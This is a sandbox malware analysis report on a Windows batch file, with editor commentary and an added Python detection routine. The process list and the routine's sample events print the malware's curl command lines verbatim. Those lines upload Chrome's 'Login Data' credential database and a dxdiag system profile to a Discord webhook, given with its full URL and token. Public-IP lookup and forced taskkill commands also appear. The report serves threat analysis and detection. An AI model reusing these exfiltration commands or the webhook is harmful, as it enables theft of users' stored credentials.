Malware Analysis Report

2025-08-05 15:47

Sample ID 240528-y6yvhsah4x
Target oran (2).bat
SHA256 f17a109dff8890fa19ea9f4324c49daabf22d4b5c9386a1a819268f04eb9adeb
Tags: persistence
Score: 7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 7/10

SHA256

f17a109dff8890fa19ea9f4324c49daabf22d4b5c9386a1a819268f04eb9adeb

Threat Level: Shows suspicious behavior

The file oran (2).bat was classified as showing suspicious behavior (score 7/10).

Malicious Activity Summary

persistence

Registers COM server for autorun

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Delays execution with timeout.exe

Modifies registry class

Note on attribution: the persistence, System32 file-drop, SCSI-registry and AdjustPrivilegeToken signatures above are raised by the Windows utilities the batch file invokes, not by a dropped payload. The COM registration rows are written by dxdiag.exe and point InprocServer32 at the stock C:\Windows\system32\dxdiagn.dll, i.e. dxdiag re-registering its own provider classes; the .PNF files under DriverStore are precompiled-INF caches written while dxdiag enumerates installed devices; the SCSI HardwareID reads belong to the same hardware inventory; and the long list of privileges enabled under WMIC.exe is what wmic.exe does on every start. The activity that warrants the score is in the behavioral2 process list: dxdiag writes a full system profile to c:\dxdiag.txt, and curl.exe uploads that file and Chrome's "Login Data" credential database to a Discord webhook (id 1245108908171722783), which should be treated as the primary indicator of compromise.

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-28 20:24

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-28 20:24

Reported

2024-05-28 20:27

Platform

win7-20240419-en

Max time kernel

118s

Max time network

124s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\oran (2).bat"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2976 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\fltMC.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\oran (2).bat"

C:\Windows\system32\fltMC.exe

fltmc

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-28 20:24

Reported

2024-05-28 20:27

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

149s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\oran (2).bat"

Signatures

Registers COM server for autorun

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32 C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\system32\\dxdiagn.dll" C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32 C:\Windows\system32\dxdiag.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\windows\system32\driverstore\filerepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_533c8d455025cc59\hdaudbus.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_b748590104fe1c15\machine.PNF C:\Windows\system32\dxdiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\usbport.inf_amd64_254cd5ae09de6b08\usbport.PNF C:\Windows\system32\dxdiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF C:\Windows\system32\dxdiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF C:\Windows\system32\dxdiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\hdaudbus.inf_amd64_533c8d455025cc59\hdaudbus.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_0d06b6638bdb4763\mshdc.PNF C:\Windows\system32\dxdiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_adeb6424513f60a2\input.PNF C:\Windows\system32\dxdiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\mshdc.inf_amd64_0d06b6638bdb4763\mshdc.PNF C:\Windows\system32\dxdiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\machine.inf_amd64_b748590104fe1c15\machine.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_254cd5ae09de6b08\usbport.PNF C:\Windows\system32\dxdiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\input.inf_amd64_adeb6424513f60a2\input.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Windows\system32\dxdiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF C:\Windows\system32\dxdiag.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dxdiag.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dxdiag.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\dxdiag.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\dxdiag.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\system32\dxdiag.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs C:\Windows\system32\dxdiag.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}" C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1 C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}" C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID\ = "DxDiag.DxDiagClassObject.1" C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove\ = "Programmable" C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\ = "DxDiagProvider Class" C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7} C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\ = "DxDiagClassObject Class" C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer\ = "DxDiag.DxDiagClassObject.1" C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32 C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\system32\\dxdiagn.dll" C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CLSID C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer\ = "DxDiag.DxDiagClassObject.1" C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class" C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\CLSID C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1 C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B} C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\ = "DxDiagClassObject Class" C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\VersionIndependentProgID C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Windows\system32\calc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{78EE6B3D-7E90-4F79-BBC4-B5E380F4806C} C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID\ = "DxDiag.DxDiagClassObject" C:\Windows\system32\dxdiag.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\ = "DxDiagProvider Class" C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\ProgID C:\Windows\system32\dxdiag.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32 C:\Windows\system32\dxdiag.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dxdiag.exe N/A
N/A N/A C:\Windows\system32\dxdiag.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\dxdiag.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1152 wrote to memory of 4268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\fltMC.exe
PID 1152 wrote to memory of 3400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3400 wrote to memory of 2140 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1152 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1152 wrote to memory of 4316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4316 wrote to memory of 908 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1152 wrote to memory of 1460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\dxdiag.exe
PID 1152 wrote to memory of 636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 4988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 4004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 548 wrote to memory of 3164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1152 wrote to memory of 4956 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1152 wrote to memory of 100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1152 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1152 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\calc.exe
PID 1152 wrote to memory of 988 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\notepad.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\oran (2).bat"

C:\Windows\system32\fltMC.exe

fltmc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get LocalDateTime /VALUE 2>NUL

C:\Windows\System32\Wbem\WMIC.exe

wmic os get LocalDateTime /VALUE

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -c "[guid]::NewGuid().ToString()"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "[guid]::NewGuid().ToString()"

C:\Windows\system32\dxdiag.exe

dxdiag /dontskip /whql:off /64bit /t c:\dxdiag.txt

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4240 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\curl.exe

curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\":\"g:b2af19bf-449f-4d89-9b01-30774846a846\"}" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"

C:\Windows\system32\curl.exe

curl -F "file1=@c:\dxdiag.txt" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"

C:\Windows\system32\curl.exe

curl -F "file1=@C:\Users\Admin\Appdata\Local\Google\Chrome\User Data\Default\Login Data" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl ifcfg.me

C:\Windows\system32\curl.exe

curl ifcfg.me

C:\Windows\system32\curl.exe

curl -o x.txt -X POST -H "Content-type: text/plain" --data 191.101.209.39 https://api.thebase64.com/encode?secret=your_secret

C:\Windows\system32\curl.exe

curl -F "[email protected]" "https://discord.com/api/webhooks/1245108908171722783/EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN"

C:\Windows\system32\taskkill.exe

taskkill /F /IM explorer.exe :: restart

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe :: restart

C:\Windows\system32\taskkill.exe

taskkill /F /IM discord.exe :: restart

C:\Windows\system32\calc.exe

calc.exe :: restart

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\notepad.exe

notepad.exe :: restart
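The process list above is effectively the batch file's command sequence: an elevation check (a bare fltmc fails unless the shell is elevated, a common batch idiom), a timestamp and a fresh GUID (presumably the "g:..." value sent in the first beacon), a dxdiag hardware and software profile written to c:\dxdiag.txt, four curl calls to one Discord webhook (a text beacon, the dxdiag profile, Chrome's Login Data database, and x.txt), a public-IP lookup against ifcfg.me, an IP address base64-encoded through api.thebase64.com into x.txt, and three forced taskkill calls. Two practical caveats: the trailing ":: restart" tokens are passed to taskkill, calc.exe and notepad.exe as literal arguments, because "::" only acts as a comment at the start of a batch line, and taskkill rejects unknown options, so the three kills most likely failed; and the -F argument of the last curl upload is mangled on this page by an e-mail-obfuscation filter (x.txt is the only file it can plausibly refer to), so detection should key on the webhook URL rather than on the file name. The routine below is an added example, not part of the sandbox's tooling: it runs offline over a constructed event list copied from the command lines above and raises the findings a SOC would want from this chain. The ATT&CK mappings (T1567.004 for webhook exfiltration, T1555.003 for browser credential stores, T1082 for the dxdiag profile, T1016 for the public-IP lookup, T1489 as the closest fit for the forced kills) are the editor's choices, not the report's.

```python
"""Added example (not sandbox tooling): detection logic for the behavioral2 command chain.

Input is a constructed list of (image, command line) pairs copied from the
process list in this report, so it runs offline; feed it Sysmon 1 / 4688 data instead.
"""
import re
from collections import Counter
from dataclasses import dataclass

WEBHOOK = ("https://discord.com/api/webhooks/1245108908171722783/"
           "EzfpiDR76Am_ijRBBMSeJKsCLa7cw7rHxUy03hk3WB1vOoluc4b3svFXDTULZ3GVXFqN")

# Constructed sample events, copied from the behavioral2 process list above.
SAMPLE_EVENTS = [
    (r"C:\Windows\system32\fltMC.exe", "fltmc"),
    (r"C:\Windows\System32\Wbem\WMIC.exe", "wmic os get LocalDateTime /VALUE"),
    (r"C:\Windows\system32\timeout.exe", "timeout /t 1"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell -c "[guid]::NewGuid().ToString()"'),
    (r"C:\Windows\system32\dxdiag.exe", r"dxdiag /dontskip /whql:off /64bit /t c:\dxdiag.txt"),
    (r"C:\Windows\system32\curl.exe",
     'curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST '
     '--data "{\\"content\\":\\"g:b2af19bf-449f-4d89-9b01-30774846a846\\"}" "' + WEBHOOK + '"'),
    (r"C:\Windows\system32\curl.exe", 'curl -F "file1=@c:\\dxdiag.txt" "' + WEBHOOK + '"'),
    (r"C:\Windows\system32\curl.exe",
     'curl -F "file1=@C:\\Users\\Admin\\Appdata\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" "'
     + WEBHOOK + '"'),
    (r"C:\Windows\system32\curl.exe", "curl ifcfg.me"),
    (r"C:\Windows\system32\curl.exe",
     'curl -o x.txt -X POST -H "Content-type: text/plain" --data 191.101.209.39 '
     "https://api.thebase64.com/encode?secret=your_secret"),
    # The -F argument of this call is mangled on the report page; kept exactly as shown there.
    (r"C:\Windows\system32\curl.exe", 'curl -F "[email protected]" "' + WEBHOOK + '"'),
    (r"C:\Windows\system32\taskkill.exe", "taskkill /F /IM explorer.exe :: restart"),
    (r"C:\Windows\system32\taskkill.exe", "taskkill /F /IM chrome.exe :: restart"),
    (r"C:\Windows\system32\taskkill.exe", "taskkill /F /IM discord.exe :: restart"),
]

WEBHOOK_RE = re.compile(r"https?://(?:[\w-]+\.)*discord(?:app)?\.com/api/webhooks/(\d+)/[\w-]+", re.I)
FORM_RE = re.compile(r'-F\s+(?:"([^"]*)"|(\S+))')      # curl -F "name=@path" or -F name=@path
TASKKILL_RE = re.compile(r"/IM\s+(\S+)", re.I)
DXDIAG_OUT_RE = re.compile(r"/t\s+(\S+)", re.I)        # dxdiag /t <output file>
PUBLIC_IP_RE = re.compile(r"\b(ifcfg\.me|ifconfig\.me|icanhazip\.com|api\.ipify\.org)\b", re.I)
# Browser credential material. Chrome/Edge: Login Data, Cookies, Web Data, Local State
# (holds the DPAPI-wrapped key). Firefox: key4.db, logins.json.
CRED_STORES = {"login data", "cookies", "web data", "local state", "key4.db", "logins.json"}
KILL_TARGETS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "discord.exe"}


@dataclass(frozen=True)
class Finding:
    image: str
    rule: str
    technique: str   # ATT&CK id chosen by the editor; empty where no clean mapping exists
    detail: str


def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()


def form_uploads(cmdline):
    """Return the local paths curl would send as multipart files (-F name=@path)."""
    paths = []
    for m in FORM_RE.finditer(cmdline):
        field = m.group(1) if m.group(1) is not None else m.group(2)
        if "=@" in field:
            paths.append(field.split("=@", 1)[1])
    return paths


def analyze(events):
    findings = []
    profile_outputs = set()   # basenames written by dxdiag /t, matched against later uploads
    for image, cmdline in events:
        exe = basename(image)
        if exe == "fltmc.exe" and cmdline.strip().lower() == "fltmc":
            findings.append(Finding(exe, "elevation check", "",
                                    "bare fltmc fails when not elevated; batch idiom for an admin test"))
        elif exe == "dxdiag.exe":
            m = DXDIAG_OUT_RE.search(cmdline)
            if m:
                profile_outputs.add(basename(m.group(1)))
                findings.append(Finding(exe, "system profile written", "T1082", m.group(1)))
        elif exe == "curl.exe":
            m = WEBHOOK_RE.search(cmdline)
            if m:
                findings.append(Finding(exe, "discord webhook contacted", "T1567.004", "webhook id " + m.group(1)))
            for path in form_uploads(cmdline):
                name = basename(path)
                if name in CRED_STORES:
                    findings.append(Finding(exe, "browser credential store uploaded", "T1555.003", path))
                elif name in profile_outputs:
                    findings.append(Finding(exe, "system profile uploaded", "T1082", path))
                else:
                    findings.append(Finding(exe, "file uploaded", "T1567", path))
            if PUBLIC_IP_RE.search(cmdline):
                findings.append(Finding(exe, "public IP lookup", "T1016", cmdline))
        elif exe == "taskkill.exe" and "/f" in cmdline.lower():
            m = TASKKILL_RE.search(cmdline)
            if m and m.group(1).lower() in KILL_TARGETS:
                findings.append(Finding(exe, "forced kill of browser/chat/shell process", "T1489", m.group(1)))
    return findings


def summarize(findings):
    return Counter(f.rule for f in findings)


def techniques(findings):
    return sorted({f.technique for f in findings if f.technique})


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.technique or '-':10} {f.rule:40} {f.detail}")
```

On the sample the routine reports the four webhook contacts (all with the same webhook id, including the call whose -F argument is mangled), the Login Data upload, the dxdiag profile write and its upload, the ifcfg.me lookup and the three forced kills; the bare "timeout", "wmic" and "powershell" lines produce nothing, which is deliberate, since on their own they are routine. In production the webhook id, not the full URL with its token, is the value to pivot on, because the token is what the sandbox page leaks and what the operator can rotate.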

Network

Reverse (in-addr.arpa) lookups sent to 8.8.8.8 and the chromewebstore.googleapis.com connection are sandbox and Edge background traffic. The script's own connections are to discord.com (the webhook), ifcfg.me and api.thebase64.com, matching the curl commands in the process list.

Country Destination Domain Proto
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
FR 216.58.215.42:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 42.215.58.216.in-addr.arpa udp
